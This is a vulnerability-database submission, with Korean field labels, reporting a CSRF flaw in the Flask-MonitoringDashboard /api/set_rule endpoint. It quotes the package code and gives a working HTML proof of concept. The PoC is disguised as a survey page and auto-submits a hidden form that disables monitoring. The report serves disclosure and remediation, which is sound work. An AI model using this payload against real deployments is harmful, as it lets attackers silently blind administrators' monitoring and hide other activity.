| 제목 | flask-dashboard Flask-MonitoringDashboard v5.0.2 CSRF |
|---|
| 설명 | # CSRF Vulnerability in Endpoint Monitoring Rule Tampering (/api/set_rule)
## Summary
A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the dashboard rule-configuration endpoint `/api/set_rule`. The lack of CSRF protection allows an attacker to force an authenticated administrator to change the monitoring level of any tracked endpoint, disabling or altering observability without authorization.
## Vulnerability Details
### Configuration-Level Issue
**File**: `flask_monitoringdashboard/core/auth.py`
```python
def admin_secure(func):
@wraps(func)
def wrapper(*args, **kwargs):
if session and session.get(config.link + '_logged_in'): # ❌ cookie-only authorization
if session.get(config.link + '_admin'):
return func(*args, **kwargs)
return redirect(url_for(config.blueprint_name + '.login'))
return wrapper
# ❌ No CSRF protection anywhere in the package
# ❌ Session cookie has no SameSite attribute enforced
```
### Endpoint-Level Code Analysis
**File**: `flask_monitoringdashboard/views/endpoint.py` (Lines 127-138)
```python
@blueprint.route("/api/set_rule", methods=["POST"])
@admin_secure
def set_rule():
"""The data from the form is validated and processed, such that the required rule is monitored"""
endpoint_name = request.form["name"]
value = int(request.form["value"])
# ❌ No CSRF token validation
# ❌ No Origin/Referer verification
with session_scope() as session:
set_endpoint_rule(session, endpoint_name, value) # ⚠️ changes monitoring rule
return "OK"
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ❌ No origin verification
3. ⚠️ Changes the monitoring rule/level for an arbitrary endpoint based only on the session cookie
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Quick survey</title>
</head>
<body>
<h2>???? Thanks for your feedback!</h2>
<!-- Disable monitoring (value=0) for a target endpoint -->
<form id="csrf-form" action="http://127.0.0.1:5000/dashboard/api/set_rule" method="POST">
<input type="hidden" name="name" value="some.endpoint">
<input type="hidden" name="value" value="0">
</form>
<script>
setTimeout(function() {
document.getElementById('csrf-form').submit();
}, 1000);
</script>
</body>
</html>
```
## Impact
**Monitoring/observability tampering** - An attacker can silently disable or alter
monitoring rules for endpoints, undermining the integrity of the collected metrics and
potentially hiding malicious activity from observability.
---
**CVSS Score**: 4.3 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N`
**CWE**: CWE-352 (Cross-Site Request Forgery)
---
**Reported by**: flashzyc
**Date**: 2026-06-07
|
|---|
| 원천 | ⚠️ https://github.com/flask-dashboard/Flask-MonitoringDashboard/issues/560 |
|---|
| 사용자 | flashzyc (UID 92850) |
|---|
| 제출 | 2026. 06. 07. AM 09:02 (1 월 ago) |
|---|
| 모더레이션 | 2026. 07. 08. AM 09:39 (1 month later) |
|---|
| 상태 | 중복 |
|---|
| VulDB 항목 | 376785 [flask-dashboard Flask-MonitoringDashboard 까지 5.0.2 교차 사이트 요청 위조] |
|---|
| 포인트들 | 0 |
|---|